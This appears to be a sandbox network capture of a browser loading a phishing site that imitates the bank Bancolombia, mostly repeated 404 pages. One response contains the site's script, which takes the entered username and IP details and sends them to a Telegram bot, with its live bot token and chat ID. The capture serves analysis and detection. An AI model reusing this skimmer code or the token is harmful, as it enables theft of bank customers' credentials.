                                                                                                                          Oct 13, 2024 18:20:40.763130903 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:40.765111923 CEST370OUTGET /archivos/ui.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.891697884 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.891776085 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.891791105 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:40.891804934 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:40.896243095 CEST419OUTGET /archivos/ingre.png HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.036062956 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:41.036082983 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:41.036098957 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:41.036195040 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:41.040023088 CEST347OUTGET /twoj.js HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.348309994 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Content-Length: 1024
                                                                                                                          Connection: keep-alive
                                                                                                                          x-amz-id-2: njtlh++C+wogcXRE33MOJ3Rmm8Stn+5IMSKHc/UoyAP556EGxtFr4WkW8JivCtXbnq16s3a06wnwUK0q1RhPG1nYXVjW+v1rhYbTGfjRd6s=
                                                                                                                          x-amz-request-id: 8SVF374DRZNEPTST
                                                                                                                          last-modified: Sat, 12 Oct 2024 23:58:07 GMT
                                                                                                                          etag: "d03064f17bc24b951422778fbff213d2"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          cache-control: no-cache
                                                                                                                          x-amz-version-id: cd60LvmozOdWC56P_8VATICY15Mrw2su
                                                                                                                          accept-ranges: bytes
                                                                                                                          server: AmazonS3
                                                                                                                          Data Raw: 2f 2f 62 6f 74 20 74 6f 6b 65 6e 0a 76 61 72 20 74 65 6c 65 67 72 61 6d 5f 62 6f 74 5f 69 64 20 3d 20 22 38 30 38 35 31 33 38 34 32 30 3a 41 41 48 78 5f 4a 4e 7a 35 49 42 7a 64 53 6d 39 41 7a 37 6b 37 4d 38 31 33 34 31 52 71 77 55 63 52 78 4d 22 3b 0a 2f 2f 63 68 61 74 20 69 64 0a 76 61 72 20 63 68 61 74 5f 69 64 20 3d 20 22 37 31 30 36 34 39 32 38 31 36 22 3b 0a 76 61 72 20 75 5f 6e 61 6d 65 2c 20 69 70 2c 20 69 70 32 3b 0a 76 61 72 20 72 65 61 64 79 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 75 5f 6e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 75 61 72 69 6f 22 29 2e 76 61 6c 75 65 3b 0a 20 0a 20 20 20 20 69 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 66 67 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3b 0a 20 20 20 20 69 70 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 61 64 64 72 65 73 73 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3b 0a 20 20 20 20 6d [TRUNCATED]
                                                                                                                          Data Ascii: //bot tokenvar telegram_bot_id = "8085138420:AAHx_JNz5IBzdSm9Az7k7M81341RqwUcRxM";//chat idvar chat_id = "7106492816";var u_name, ip, ip2;var ready = function () { u_name = document.getElementById("usuario").value; ip = document.getElementById("gfg").innerHTML; ip2 = document.getElementById("address").innerHTML; message = "-Banc0lombia-\nUsuario: " + u_name + "\nip" + ip +"\n" + ip2 +"\n-LOGIN-";};var sender = function () { ready(); var settings = { "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", "method": "POST", "headers": {
                                                                                                                          Oct 13, 2024 18:20:41.348330021 CEST344INData Raw: 20 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3a 20 22 6e 6f 2d 63 61 63 68 65 22 0a 0a 20 20 20 20
                                                                                                                          Data Ascii: "Content-Type": "application/json", "cache-control": "no-cache" }, "data": JSON.stringify({ "chat_id": chat_id, "text": message }) }; $.ajax(settings).done(function (respons
                                                                                                                          Oct 13, 2024 18:20:41.479995966 CEST520OUTGET /archivos/tlf1.html HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.626321077 CEST1061INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Content-Length: 551
                                                                                                                          Connection: keep-alive
                                                                                                                          x-amz-id-2: d7dpz5KHueBUd7nf0v1JjOhfgymcNI5Twz7vrXUMyiG8IIRFqUW7JxFTvzD9npNGv6kvN7Z8/ow=
                                                                                                                          x-amz-request-id: 8SV0529ZP5STA8GH
                                                                                                                          last-modified: Sat, 12 Oct 2024 23:58:07 GMT
                                                                                                                          etag: "210a2b0f6e79131106c24c9ad5937898"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          cache-control: no-cache
                                                                                                                          x-amz-version-id: r20LO0iXpSy3TUvCNTISseEXpTDlrLSp
                                                                                                                          accept-ranges: bytes
                                                                                                                          server: AmazonS3
                                                                                                                          Data Raw: 0a 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 30 2e 31 22 3e 3c 74 69 74 6c 65 3e 74 6c 66 31 2e 6a 70 67 20 28 36 32 37 c3 97 33 32 37 29 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 22 3e 3c 70 3e 3c 70 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 70 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6d [TRUNCATED]
                                                                                                                          Data Ascii: <html style="height: 100%;"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, minimum-scale=0.1"><title>tlf1.jpg (627327)</title></head><body style="margin: 0px; height: 100%"><p><p style="text-align: center;"><p style="text-align: center;"><img src="https://mtmarketing.co/wp-content/uploads/2021/07/entrevista-adriana-arismendi.jpeg" alt="Bancolombia se despide de la bandera colombiana al renovar su marca | Agencia de Marketing Digital" width="574" height="287" /></p>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.4497393.219.195.73802316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 13, 2024 18:20:40.277348042 CEST381OUTGET /hhhhhh_files/slidemenu.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.779181957 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.779196024 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.779216051 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:40.779230118 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:40.780584097 CEST379OUTGET /archivos/showLoading.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.930083036 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.930097103 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.930111885 CEST448INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:40.930124044 CEST889INData Raw: 20 20 20 20 20 63 6f 6e 73 74 20 72 65 71 75 65 73 74 54 6f 6b 65 6e 20 3d 20 22 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 0a 20 20 20 20 20 20 20 20 72 65 71 75 65 73 74 53 74 6f 72 61 67 65 41 63 63 65 73 73 28 29 0a 20 20 20 20 20 20 20 20 20 20 2e 74
                                                                                                                          Data Ascii: const requestToken = "" || null; requestStorageAccess() .then(() => { window.parent.postMessage({ type: "REQUEST_AUTH_TOKEN", requestToken }, "https://glitch.com"); }, (e) => { window.a
                                                                                                                          Oct 13, 2024 18:20:41.481614113 CEST441OUTGET /archivos/icon-user.png HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/archivos/style.css
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.619395971 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
